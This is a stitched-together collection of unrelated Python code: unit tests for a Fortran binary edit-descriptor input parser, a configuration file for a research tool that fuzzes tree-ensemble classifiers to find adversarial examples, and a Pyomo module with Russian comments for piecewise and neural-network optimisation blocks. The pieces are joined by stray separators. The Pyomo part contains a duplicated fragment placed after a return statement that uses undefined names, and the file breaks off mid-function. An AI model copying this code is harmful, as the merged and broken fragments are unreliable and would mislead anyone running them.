fmt = '''(1B1)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_915(self):
inp = '''100000'''
fmt = '''(1B1)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_916(self):
inp = '''-100000'''
fmt = '''(1B1)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_917(self):
inp = '''10 0 00 10 0 0 1'''
fmt = '''(1B1)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_918(self):
inp = '''10101000'''
fmt = '''(1B1)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_919(self):
inp = '''0'''
fmt = '''(1B2)'''
result = [0]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_920(self):
inp = '''-0'''
fmt = '''(1B2)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_921(self):
inp = '''1'''
fmt = '''(1B2)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_922(self):
inp = '''-1'''
fmt = '''(1B2)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_923(self):
inp = '''2'''
fmt = '''(1B2)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_924(self):
inp = '''10'''
fmt = '''(1B2)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_925(self):
inp = '''-10'''
fmt = '''(1B2)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_926(self):
inp = '''100'''
fmt = '''(1B2)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_927(self):
inp = '''-100'''
fmt = '''(1B2)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_928(self):
inp = '''1000'''
fmt = '''(1B2)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_929(self):
inp = '''-1000'''
fmt = '''(1B2)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_930(self):
inp = '''10000'''
fmt = '''(1B2)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_931(self):
inp = '''-10000'''
fmt = '''(1B2)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_932(self):
inp = '''100000'''
fmt = '''(1B2)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_933(self):
inp = '''-100000'''
fmt = '''(1B2)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_934(self):
inp = '''10 0 00 10 0 0 1'''
fmt = '''(1B2)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_935(self):
inp = '''10101000'''
fmt = '''(1B2)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_936(self):
inp = '''0'''
fmt = '''(1B3)'''
result = [0]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_937(self):
inp = '''-0'''
fmt = '''(1B3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_938(self):
inp = '''1'''
fmt = '''(1B3)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_939(self):
inp = '''-1'''
fmt = '''(1B3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_940(self):
inp = '''2'''
fmt = '''(1B3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_941(self):
inp = '''10'''
fmt = '''(1B3)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_942(self):
inp = '''-10'''
fmt = '''(1B3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_943(self):
inp = '''100'''
fmt = '''(1B3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_944(self):
inp = '''-100'''
fmt = '''(1B3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_945(self):
inp = '''1000'''
fmt = '''(1B3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_946(self):
inp = '''-1000'''
fmt = '''(1B3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_947(self):
inp = '''10000'''
fmt = '''(1B3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_948(self):
inp = '''-10000'''
fmt = '''(1B3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_949(self):
inp = '''100000'''
fmt = '''(1B3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_950(self):
inp = '''-100000'''
fmt = '''(1B3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_951(self):
inp = '''10 0 00 10 0 0 1'''
fmt = '''(1B3)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_952(self):
inp = '''10101000'''
fmt = '''(1B3)'''
result = [5]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
| |
import os
from os.path import join
INVESTIGATE = False # Records coverages and saves them. Generates a plot in the end. Do not use with automate.
TEST_OUTSIDE_FUZZER = False # Runs FATE as standalone (1+1) EA
BLACKBOX = True and TEST_OUTSIDE_FUZZER # Disables white-box information such as thresholds and feat imp.
FORCE_DEFAULT_EPSILON = True or TEST_OUTSIDE_FUZZER # Runs all datasets with the default epsilon
FORCE_DEFAULT_MUTATION_CHANCE = False or TEST_OUTSIDE_FUZZER # Runs all datasets with the default mutation chance
LIMIT_TIME = True # If false, run 10 times as long
############ FATE Standalone ############
CROSSOVER_CHANCE = 0.001 # Chance that crossover occurs
CROSSOVER_RANDOM_CHANCE = 1.0 # Actual chance for crossover with random features is 0.001
# CROSSOVER_CHANCE * CROSSOVER_RANDOM_CHANCE
NUM_RUNS = 100000000 # Unlimited. Change for smaller amount of runs
POPULATION_SIZE = 1 # Population size.
############ RQ 1 defaults ############
MEASURE_EXEC_P_S = True # Parse the number of executions per second.
ALLOW_FLOAT_MIS_CLASSIFICATION = True # If True, do not filter mis-classifications from the produced AE
CONSISTENT_DRAWS = True # Seeds random with 0, to create consistent check-set draws
FUZZ_ONE_POINT_PER_INSTANCE = True # compile to generic fuzz target and fuzz per point
USE_CUSTOM_MUTATOR = True # If False, use the standard mutator of LibFuzzer
USE_CROSSOVER = True and USE_CUSTOM_MUTATOR # Combines mutation with crossover (split at random location)
USE_GAUSSIAN = True # Gaussian vs random uniform mutation
USE_PROBABILITY_STEPS_SPECIAL = True # Proba descent based on small proba diff between 2nd class predicted
PROBA_LIMIT_WITHIN_EPSILON = True # Only save seeds if within epsilon
WRITE_AE_ONLY_IF_BETTER_OUTSIDE_BRANCHES = True # Saves execution time
ALWAYS_OPTIMIZE = True # Otherwise only optimize small files
MUTATE_DEPTH = 7 if TEST_OUTSIDE_FUZZER else 5 # The maximum number of consecutive mutations per seed for LibFuzzer
DEFAULT_EPSILON = 0.1 if TEST_OUTSIDE_FUZZER else 0.2 # Default epsilon
DEFAULT_MUTATE_CHANCE = 0.5 if TEST_OUTSIDE_FUZZER else 0.1 # Chance that a single features is mutated
FUZZER = 'libFuzzer'
# FUZZER = 'AFL++'
# FUZZER = 'honggfuzz'
# FUZZER = 'AFLGo'
FUZZERS = ['libFuzzer', 'AFL++', 'AFLGo', 'honggfuzz']
if FUZZER not in FUZZERS:
raise ValueError(f'Fuzzer {FUZZER} not recognised, should be one of [{", ".join(FUZZERS)}]')
if FUZZER == 'honggfuzz' and USE_CUSTOM_MUTATOR:
raise ValueError('Honggfuzz and custom mutator is not supported')
############ RQ 2 defaults ############
AE_MUTATE_TOWARDS_VICTIM = True # If AE, mutate values only towards victim point.
MUTATE_BIGGEST_CHANCE = 0.5 # When an AE is found, the chance to only mutate all biggest difference fs towards victim
ALSO_MUTATE_BIGGEST = True # Always mutate all features > the biggest l-inf distance - 0.01. Only with FUZZ_ONE
# These alter the chance that a feature is mutated
BIAS_MUTATE_BIG_DIFFS = True
USE_THRESHOLDS_FOR_MUTATION = True and not BLACKBOX # move to optimal boundary value after drawing from mutation dist
# Fuzzes for each datapoint with and without AE init
DOUBLE_FUZZ_WITH_AE = True and not (TEST_OUTSIDE_FUZZER or INVESTIGATE)
USE_FEATURE_IMPORTANCE = True and not BLACKBOX # prioritize more important features for mutation
INITIALIZE_WITH_POINT_IN_BETWEEN = True and DOUBLE_FUZZ_WITH_AE
INITIALIZE_WITH_EXTRA_POINTS_IN_BETWEEN = True and INITIALIZE_WITH_POINT_IN_BETWEEN
if TEST_OUTSIDE_FUZZER and (not FUZZ_ONE_POINT_PER_INSTANCE):
raise ValueError('Test outside fuzzer conflicting options')
if TEST_OUTSIDE_FUZZER and DOUBLE_FUZZ_WITH_AE and (POPULATION_SIZE < 2 or CROSSOVER_RANDOM_CHANCE > 0.99):
raise ValueError('Test outside fuzzer double fuzz configuration problem')
############ RQ 1.2 defaults ############
FILTER_BAD_AE = True # If True, discards all AE that are worse than FAILURE_THRES
FUZZ_ONLY_COV_FOR_FOREST = False # Only insert coverage-guidance for the lines that belong to the Forest
FUZZ_ONLY_COV_FOR_CHECK = True # Only insert coverage-guidance for the lines that belong to the objective function
FUZZ_WITHOUT_COVERAGE_GUIDANCE = False # If True, baseline: removes almost all coverage guidance (except TestOneInput)
if FUZZER == 'AFL++' and FUZZ_WITHOUT_COVERAGE_GUIDANCE:
raise ValueError('AFL++ crashes because the fuzzer name cannot be set with the -n (no instrument) option')
############ Objective function settings ############
COMBINE_DISTANCE_AND_PROBABILITY = False # distance = distance + probability
USE_PROBABILITY_STEPS = False # probability steps in the check function ELSE branch
PROBA_SPECIAL_ALWAYS = False
PROBA_SPECIAL_START_STEP = 0.2
PROBA_SPECIAL_STEP_SIZE = 0.01
WRITE_AE_ALWAYS_IN_IF = False # Slower option for the objective function
if USE_PROBABILITY_STEPS and USE_PROBABILITY_STEPS_SPECIAL:
raise ValueError('Select at most one type of probability step')
if WRITE_AE_ALWAYS_IN_IF and WRITE_AE_ONLY_IF_BETTER_OUTSIDE_BRANCHES:
raise ValueError('Only one write_X can be used on the settings')
############ Fuzzer settings ############
NEVER_OPTIMIZE = False
FORCE_ENTROPIC = False # libfuzzer. Experimental. Enables entropic power schedule.
NO_ENTROPIC = False
FOCUS_FUNCTION = "0" # focus_function 0 Experimental. Fuzzing will focus on inputs that trigger calls
# # to this function. If -focus_function=auto and -data_flow_trace is used, libFuzzer will choose the
# focus functions automatically.
if sum([FUZZ_WITHOUT_COVERAGE_GUIDANCE, FUZZ_ONLY_COV_FOR_CHECK, FUZZ_ONLY_COV_FOR_FOREST]) > 1:
raise ValueError('Only one coverage guidance option can be used at the same time')
if NEVER_OPTIMIZE and ALWAYS_OPTIMIZE:
raise ValueError('Conflicting optimize options')
############ AFL settings ############
# TIME_NO_NEW_COV = 10
IS_AE_CHANCE = 0.5 # Because we cannot access the fuzzer logic in the mutator
NUM_CYCLES_IN_LOOP = 1000 # Number of consecutive iterations after which we start with a clean sheet
AFL_USE_DICT = True and not USE_CUSTOM_MUTATOR
AFL_USE_CMP_LOG = False and not USE_CUSTOM_MUTATOR
ENABLE_DETERMINISTIC = False
SKIP_DETERMINISTIC = False
# see docs/power_schedules.md
AFL_SCHEDULE = None # one of fast(default, use None), explore, exploit, seek, rare, mmopt, coe, lin, quad
# AFL generic
AFL_MUTATE_FILENAME = "afl_mutation.cc"
AFL_OUTPUT_DIR = "afl_out"
# AFL++
AFLPP_DICT_PATH = join(os.getcwd(), 'afl_dict')
AFLPP_TEMPLATE_PATH = "templates/aflpp.jinja2"
MUTATE_TEMPLATE_PATH = "templates/mutate.jinja2"
AFLPP_COMPILER_PATH = "afl-clang-lto++"
# AFLPP_COMPILER_PATH = "afl-clang-fast++"
# AFLGo
AFL_GO_COMPILER_PATH = "/home/cas/AFLGo/afl-clang-fast++"
AFL_GO_FUZZ_PATH = "/home/cas/AFLGo/afl-fuzz"
AFL_GO_GEN_DIST_PATH = "/home/cas/AFLGo/scripts/gen_distance_fast.py"
AFL_GO_TARGETS_FILE = 'BBtargets.txt'
AFLGO_TEMPLATE_PATH = "templates/aflgo.jinja2"
############ honggfuzz settings ############
HONG_COMPILER_PATH = "/home/cas/honggfuzz/hfuzz_cc/hfuzz-clang++"
HONG_FUZZER_PATH = "/home/cas/honggfuzz/honggfuzz"
HONG_OUTPUT_DIR = "hongg_out"
############ Mutation settings ############
MINIMIZE_THRESHOLD_LIST = False # Removes all thresholds within 0.0001 from each other
IS_AE_FAKE = False # Fakes the model query if the current input is an AE
USE_WAS_AE = False # Saves the result of the last known model query
STEEP_CURVE = False # If True, square the draw from the gaussian distribution, such that smaller draws are more likely
# feature importance is calculated by its occurrence
FEATURE_IMPORTANCE_BASED_ON_OCCURRENCE = False and USE_FEATURE_IMPORTANCE
MUTATE_LESS_WHEN_CLOSER = False # When True, multiplies mutation with largest diff between fuzzed and victim.
# as splitting threshold in the forest. Cannot be true together with AE_MUTATE_TOWARDS_VICTIM
AE_CHECK_IN_MUTATE = (ALSO_MUTATE_BIGGEST or BIAS_MUTATE_BIG_DIFFS or USE_THRESHOLDS_FOR_MUTATION or
AE_MUTATE_TOWARDS_VICTIM or MUTATE_LESS_WHEN_CLOSER) and FUZZ_ONE_POINT_PER_INSTANCE \
and FUZZER != 'AFL++'
if MUTATE_LESS_WHEN_CLOSER and AE_MUTATE_TOWARDS_VICTIM:
raise ValueError('Mutate less and AE mutate towards original cannot be used together')
############ AE init ############
# k-ANN structure
ANN_TREES = 10 # the amount of trees for the "annoy" lookup
K_ANN = 10 # how many nearest neighbours to find
NO_SEED_INIT = False # When True, each run is only seeded with all-0 features. No input is not possible, because
# The custom mutator would otherwise break.
INITIALIZE_WITH_AE = False # use ANN to seed with K_ANN closest data-points from other classes
INITIALIZE_WITH_AVG_OPPOSITE = False # For binary-classification: seed with average member of the other class
INITIALIZE_WITH_POINT_IN_BETWEEN = INITIALIZE_WITH_POINT_IN_BETWEEN or \
(True and INITIALIZE_WITH_AE)
INITIALIZE_WITH_EXTRA_POINTS_IN_BETWEEN = INITIALIZE_WITH_EXTRA_POINTS_IN_BETWEEN or \
(True and INITIALIZE_WITH_POINT_IN_BETWEEN)
INITIALIZE_WITH_FULL_TRAIN_SET = False # Put all instances of other class from test set in corpus.
if INITIALIZE_WITH_FULL_TRAIN_SET and (INITIALIZE_WITH_AE or DOUBLE_FUZZ_WITH_AE):
raise ValueError('INITIALIZE_WITH_FULL_TRAIN_SET cannot be used with INITIALIZE_WITH_AE or DOUBLE_FUZZ_WITH_AE')
if sum([INITIALIZE_WITH_AE, INITIALIZE_WITH_AVG_OPPOSITE, INITIALIZE_WITH_FULL_TRAIN_SET]) > 1:
raise ValueError('Conflicting initialize options')
############ Testing ############
DEBUG = False # If True, shows output and runs 1 sample with 1 thread only.
MEASURE_COVERAGE = False # Measure coverage through instrumentation, costs exec/s
SKIP_COMPILATION = False
COMPILE_ONLY = False
PRINT_NUMBER_OF_LEAVES = False # Estimate for model size
INVESTIGATE_WITH_SCATTER = False and INVESTIGATE # Shows a scatter plot instead of a line plot when INVESTIGATE
NUM_INVESTIGATE_RUNS = 5 # The number of repetitions for creating plots.
FAILURE_THRES = 0.9 # See FILTER_BAD_AE
SHOW_OUTPUT = False or DEBUG # Shows fuzzer output
CREATE_LOOKUP = False or INITIALIZE_WITH_AE or INITIALIZE_WITH_AVG_OPPOSITE or INVESTIGATE \
or INITIALIZE_WITH_FULL_TRAIN_SET or DOUBLE_FUZZ_WITH_AE
if DEBUG and MEASURE_EXEC_P_S:
raise ValueError('Debug and measure exec/s cannot be used at the same time')
if INVESTIGATE and DOUBLE_FUZZ_WITH_AE:
raise ValueError('Double fuzz together with investigate should not be used.')
NUM_DEBUG = 1
NUM_THREADS = 10 if not DEBUG else NUM_DEBUG # Number of simultaneous fuzzing instances, but is also
# Used for training the ensembles, the MILP attack and the lt-attack (Zhang)
NUM_ADV_SUPER_QUICK = 10 # The number of victims to attack for runs with the -qq flag.
NUM_ADV_QUICK = 50 # The number of victims to attack for runs with the -q flag.
NUM_ADV_CHECKS = 500 if not DEBUG else NUM_DEBUG # number of adversarial victims
MAX_POINTS_LOOKUP = 5000 # The AE lookup will be created over this amount of training samples maximum
DEFAULT_TIME_PER_POINT = 1 # The default fuzzing time per datapoint
MODEL_TYPES = ['RF', 'GB'] # the identifiers of the model types (Random Forest, Gradient Boosting)
DISTANCE_NORMS = ['l_0', 'l_1', 'l_2', 'l_inf']
DISTANCE_NORM = 'l_inf' | |
<filename>LinearParametrization.py<gh_stars>0
from pyomo.environ import *
from pyomo.core import (Block,
Var,
Constraint,
RangeSet,
NonNegativeReals,
Binary)
import pandas as pd
import numpy as np
import numbers
from sklearn.linear_model import LinearRegression
from scipy.spatial import Delaunay, ConvexHull
from sklearn.metrics import mean_absolute_error
from sklearn.preprocessing import StandardScaler
def NN_Block(t,dfI,nn,scaler,*ext):
# nn # Структура нейронной сети
# ext # Ограничения на переменные
# dfI # Датафрейм для построения ограничивающей выпуклой оболочки
Vars = dfI.columns
b = Block(concrete=True)
b.t = t
Values = dfI.values
ValsF = Values[:,-1].reshape(-1,)
# 1. Формируется список переменных
# Объявляются переменные
b.Vars = Var(b.t, Vars)
b.Stage = Var(within=Binary)
b.VarNames = Vars
n = nn.hidden_layer_sizes
b.dimensions = RangeSet(0, n-1)
b.H = Var(b.dimensions, b.t, bounds=(-10000,10000))
b.aH = Var(b.dimensions, b.t, bounds=(-10000,10000))
def single_region_rule(b, i, t):
Expr=0
k=0
for var in Vars[0:-1]:
Expr += (b.Vars[t,var] - b.Stage*scaler.mean_[k])/scaler.scale_[k]*nn.coefs_[0][k,i]
k+=1
return (Expr + b.Stage*nn.intercepts_[0][i] == b.H[i,t])
b.c_srr = Constraint(b.dimensions, b.t, rule=single_region_rule)
if nn.activation == 'relu':
xdata = [-10000., 0., 10000.]
ydata = [ 0., 0., 10000.]
elif nn.activation == 'identity':
xdata = [-10000., 0., 10000.]
ydata = [-10000., 0., 10000.]
else:
raise ValueError('Only relu and identity activation fuctions are allowed for neural network')
#Фунция ReLU: aH = max(0,H) or aH==H in 'identity' case
b.Cons = Piecewise(b.dimensions, b.t, b.aH, b.H, pw_pts=xdata, pw_constr_type="EQ", f_rule=ydata, pw_repn="SOS2")
# Формируем Целевую функцию
def c_y(b, t):
return (sum(b.aH[i,t]*nn.coefs_[1][i][0] for i in b.dimensions) +
b.Stage*nn.intercepts_[1][0])*scaler.scale_[-1] + b.Stage*scaler.mean_[-1] == b.Vars[t,Vars[-1]]
b.c_y = Constraint(b.t, rule = c_y) # Задаём уравнения для каждого момента t
# 3. Задаётся характеристика поверхности
# Формируется поверхность
if nn.coefs_[0].shape[0]>1:
hullPoints = ConvexHull(np.array(dfI)[:,:-1])
planes = np.unique(hullPoints.equations,axis=0)
elif nn.coefs_[0].shape[0]==1:
planes = np.array([[-1,dfI.iloc[:,0].min()],[1,-dfI.iloc[:,0].max()]])
else:
raise ValueError('Zero_dimension data')
b.c_ch = ConstraintList()
for t_ in b.t:
for i in range(planes.shape[0]):
pl=planes[i]
Expr=0
k=0
for var in Vars[0:-1]:
Expr += b.Vars[t_,var]*pl[k]
k+=1
Expr = Expr <= b.Stage*(-1e-4-pl[k])
b.c_ch.add(Expr)
# 4. Задаём ограничения на переменные
if len(ext)>0:
extD=ext[0] # Словарь
# Проверяем: есть ли переменные в Vars
# Определяем функцию формирования ограничений
def c_Ext(b,t,ExtVar):
return b.Vars[t,ExtVar] == b.Stage*extD[ExtVar]
# Проверяем корректность написания ограничений и добавляем в массив
Ext = []
for n in Vars:
if n in extD:
Ext.append(n)
# формируем набор ограничений для каждого элемента
b.c_ExtConst = Constraint(b.t, Ext, rule = c_Ext)
return b
def CH_Block(t,df,*ext):
Values = df.values
Vars = list(df.columns)
b = Block(concrete=True)
ValsX = Values[:,:-1]
ValsF = Values[:,-1]
# 1. Формируется список переменных
# Объявляются переменные
b.Vars = Var(t, Vars)
b.Stage = Var(within=Binary)
b.VarNames = Vars
b.t=t
# 2. Определяем линейную регрессию поверхности
lm = LinearRegression()
lm.fit(ValsX,ValsF)
coeff = np.append(lm.coef_, np.array(-1))
def c_D0_(b,t):
expr = b.Stage * lm.intercept_
k=0
for var in Vars:
expr += b.Vars[t,var]*coeff[k]
k=k+1
return expr==0
b.c_F = Constraint(t,rule=c_D0_)
# 3. Задаётся характеристка поверхности
# Формируется поверхность
if len(Vars)>2:
hullPoints = ConvexHull(np.array(df)[:,:-1])
planes = np.unique(hullPoints.equations,axis=0)
elif len(Vars)==2:
planes = np.array([[-1,ValsX[:,0].min()],[1,-ValsX[:,0].max()]])
else:
raise ValueError('Zero_dimension data')
b.c_ch = ConstraintList()
for t_ in t:
for i in range(planes.shape[0]):
pl=planes[i]
Expr=0
k=0
for var in Vars[0:-1]:
Expr += b.Vars[t_,var]*pl[k]
k+=1
Expr = Expr <= b.Stage*(-1e-4-pl[k])
b.c_ch.add(Expr)
if len(ext)>0:
extD=ext[0] # Словарь
# Проверяем: есть ли переменные в Vars
# Определяем функцию формирования ограничений
def c_Ext(b,t,ExtVar):
return b.Vars[t,ExtVar] == b.Stage*extD[ExtVar]
# Проверяем корректность написания ограничений и добавляем в массив
Ext = []
for n in Vars:
if n in extD:
Ext.append(n)
# формируем набор ограничений для каждого элемента
b.c_ExtConst = Constraint(t, Ext, rule = c_Ext)
return b
def BuildPiecewise1D_1S(var_,namevar,x,zvals,t,stage):
# Одномерная характеристика
b = Block(concrete=True)
npoints = len(zvals)
nt=len(t)
b.vertices = RangeSet(0, npoints-1)
b.simplices = RangeSet(0, npoints-2)
b.t=RangeSet(0,nt-1)
b.lmda = Var(b.vertices,b.t, within=NonNegativeReals)
b.y = Var(b.simplices,b.t, within=Binary)
# сумма лябмд = stage
def lmbda_summ_rule(b,t):
return sum(b.lmda[v,t] for v in b.vertices) == stage
b.convex_c=Constraint(b.t, rule=lmbda_summ_rule)
# z=сумма(zi*лямбда i)
def z_var_rule(b,t):
return var_[t,namevar[-1]] == sum(zvals[v]*b.lmda[v,t] for v in b.vertices)
b.output_c=Constraint(b.t, rule=z_var_rule)
# x=сумма(xi*лямбда i)
def x_var_rule(b,t):
return var_[t,namevar[0]] == sum(x[v]*b.lmda[v,t] for v in b.vertices)
b.inpuit_c=Constraint(b.t, rule=x_var_rule)
# Только две соседние лямбды не нулевые
vertex_to_simplex = [[] for v in b.vertices]
#vertex_to_simplex=vertex_to_simplex[:-1]
simplices = [[v,v+1] for v in b.vertices]
simplices=simplices[:-1]
#print(simplices)
#vertex_to_simplex[0]=b.vertices.first()
#vertex_to_simplex[-1]=b.vertices.last()
for s, simplex in enumerate(simplices):
for v in simplex:
vertex_to_simplex[v].append(s)
#print(vertex_to_simplex)
def vertex_regions_rule(b,v,t):
return b.lmda[v,t] <= sum(b.y[s,t] for s in vertex_to_simplex[v])
b.vertex_regions_c =Constraint(b.vertices, b.t, rule=vertex_regions_rule)
# Всегда выбираем один из полигонов:
# Сумм(полигон[i])==1
def single_region_rule(b,t):
return sum(b.y[s,t] for s in b.simplices) == stage
b.single_region_c = Constraint(b.t,rule=single_region_rule)
return b
def vertex_regions_rule(b,v,t):
return b.lmda[v,t] <= sum(b.y[s,t] for s in vertex_to_simplex[v])
b.vertex_regions_c =Constraint(b.vertices, b.t, rule=vertex_regions_rule)
# Всегда выбираем один из полигонов:
# Сумм(полигон[i])==1
def single_region_rule(b,t):
return sum(b.y[s,t] for s in b.simplices) == stage[t]
b.single_region_c = Constraint(b.t,rule=single_region_rule)
return b
def BuildPiecewiseND_1S(vars_, namevars, tri, zvals,t,stage):
"""
Builds constraints defining a N-dimensional
piecewise representation of the given triangulation.
Args:
xvars: A (D, 1) array of Pyomo variable objects
representing the inputs of the piecewise
function.
zvar: A Pyomo variable object set equal to the
output of the piecewise function.
tri: A triangulation over the discretized
variable domain. Required attributes:
- points: An (npoints, D) shaped array listing the
D-dimensional coordinates of the
discretization points.
- simplices: An (nsimplices, D+1) shaped array of
integers specifying the D+1 indices
of the points vector that define
each simplex of the triangulation.
zvals: An (npoints, 1) shaped array listing the
value of the piecewise function at each of
coordinates in the triangulation points
array.
Returns:
A Pyomo Block object containing variables and
constraints that define the piecewise function.
"""
b = Block(concrete=True)
nt=len(t)
ndim = len(namevars)-1
nsimplices = len(tri.simplices)
npoints = len(tri.points)
pointsT = list(zip(*tri.points))
# create index objects
# Список переменных [X Y Z]
